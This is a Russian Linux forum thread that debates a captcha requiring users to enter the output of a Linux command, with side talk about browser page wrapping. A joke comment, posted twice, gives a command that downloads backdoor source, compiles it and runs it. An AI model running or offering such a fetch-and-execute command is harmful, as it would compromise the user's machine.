LINUX.ORG.RU

[матан-капча] Просить пользователей при регистрации вводить выхлоп какой-нибудь команды Linux

0

0

В толксах (http://www.linux.org.ru/forum/clown-house/5660138) родилась идея: списать с форума ArchLinux (https://bbs.archlinux.org/) особую капчу. При регистрации или отправке анонимного комментария предлагать пользователю указать вывод какой-нибудь команды Linux. Например: «date -u +%j$(uname)|sha256sum|sed 's/\W//g'»

Кто не укажет, тому разрешать писать только в Linux-install.

При таком ограничении здесь останутся только те тролли, которые хотя бы линукс в глаза видели. Ну или хотя бы настолько упорны, чтобы у кого-нибудь спросить, что эта команда выведет. Но если такое будет происходить часто, можно задавать вопрос, скажем, раз в неделю.

Для допуска пользователей *BSD, Солярки и других POSIX-совместимых систем можно либо спрашивать только POSIX-совместимые команды, либо такие, чтобы умный человек догадался, где и что в команде надо подправить.

P.S.Тема создана по заявкам телезрителей.
P.P.S.Про однострочник на Перле уже пошутили.

★★★★★
Ответ на: комментарий от Lumi
549786c5b759115b868fe415898cbc2343d0a6cee675cb613876102cd90eb3ae57536e9b6370001705b6dfd5506d48f73183640a1b81d18aac9d3fd51f9e353d

Хоть бы в тег засунул! >_< Все никак не мог понять какого Х у меня появился горизонтальный скролл

MrHouse
()
Ответ на: комментарий от www_linux_org_ru

Сам текст однострочника может быть визуально искажён.

KblCb ★★★★★
()
Ответ на: комментарий от slackwarrior

>Мдя... Я же не спрашиваю, какое белье она носит по пятницам?..

А ты знаешь? о_О

Уболтали, можно из капчи этот вопрос убрать :)

valich ★★★
()
Ответ на: комментарий от MrHouse

>Все никак не мог понять какого Х у меня появился горизонтальный скролл

Другие браузеры, кроме Оперы, так и не осилили до сих пор свёртку широких страниц? :)

KRoN73 ★★★★★
()
Ответ на: комментарий от slackwarrior

Ага :)

(что интересно, пишу это из Firefox :D)

KRoN73 ★★★★★
()

test test test, ага.

Deleted
()
Ответ на: комментарий от KRoN73

Я сейчас на работе под офтопиком

А вообще, в настройках мидори указывается масштабировать с изображениями или только шрифт. Причём горячие клавиши можно свои указывать. По + увеличиваю шрифт, отображение страницы в размер экрана без полосы горизонтальной прокрутки. Кроме оперы такую шнягу нигде не видел. Ёщё бы кэш в оперативную память переопределить, как с фоксом, и всё бы меня устроило.

kraftello ★★★★★
()
Ответ на: Я сейчас на работе под офтопиком от kraftello

>А вообще, в настройках мидори указывается масштабировать с изображениями или только шрифт

Это и близко не то. Вот у тебя стоит <pre>...</pre> код с длинным сплошным текстом. Скажем, в 1000 символов. Масштабированием ты не сможешь избавиться от скроллинга, не уменьшив размер шрифта до совершенно нечитаемого размера.

В Опере много лет есть галочка «Свернуть по ширине», которая отрубает скроллинг, какие бы не были условия показа страницы, не трогая размеры текста. Если у тебя длинный преформатированный текст без переносов - перенесёт. Если огромная картинка - уменьшит размером. И т.д. Очень удобная фишка, особенно раньше, когда на ЛОРе была опция преформатированного текста и народ с ней кидал очень широкие простыни.

KRoN73 ★★★★★
()
Ответ на: комментарий от KRoN73

Спасибо

Не обращал внимания. Просто сейчас мидори пользовать начал, так как бета оперы начала кушать проц, а шум кулера ноута отвлекает.

kraftello ★★★★★
()

Просить надо выводить выхлоп однострочника, не иначе.

melkor217 ★★★★★
()

Ох уже это сочетание вахтерского синдрома и молодости - все вам массовые расстрелы и желтые метки в гетто подавай.

Если и делать такое - то делать глубоко опционально. Залез в специальный раздел и прошел тесты. Тут как раз можно будет не мелочится и предложить целый парк атткационов. Если аноним - то результат в инфо сессии.

Соотвественно рядом со звездочками(а особо злобным - на лоб) лепить гордым прохожденцам ордена и медальки в виде, например, маленьких пингвинов.

Можно тесты кстати сделать большие и объемные в стиле конкурса яндекса или экзамена редхата - чтобы особо упорные могли в случае чего тыкая своим рейтингом в морду редким жобхантерам требовать бабла, или мерялись рейтингом.

kernel ★★☆
()
Ответ на: комментарий от Eddy_Em

возможность игнора по юзерагентам нужна

thunar ★★★★★
()

> Кто не укажет, тому разрешать писать только в Linux-install.

Молодой человек. Большинство здешних анонимных вендотроллей знают эти выхлопы наизусть и с ними одними тебе будет тут оооой как неуютно.

iBliss
()
Ответ на: комментарий от iBliss

>Большинство здешних анонимных вендотроллей знают эти выхлопы наизусть и с ними одними тебе будет тут оооой как неуютно.
а ежели они меняются в зависимости от даты? + просить хэш после нескольких алгоритмов?
думаю тут даже самые просветлённые сольют

megabaks ★★★★
()

wget $URL_TO_BACKDOR_SOURCE && gcc backdoor.c && ./a.out

Deleted
()

wget $URL_TO_BACKDOR_SOURCE && gcc backdoor.c && ./a.out

Deleted
()

Как-то строго, мне кажется.

neocrust ★★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.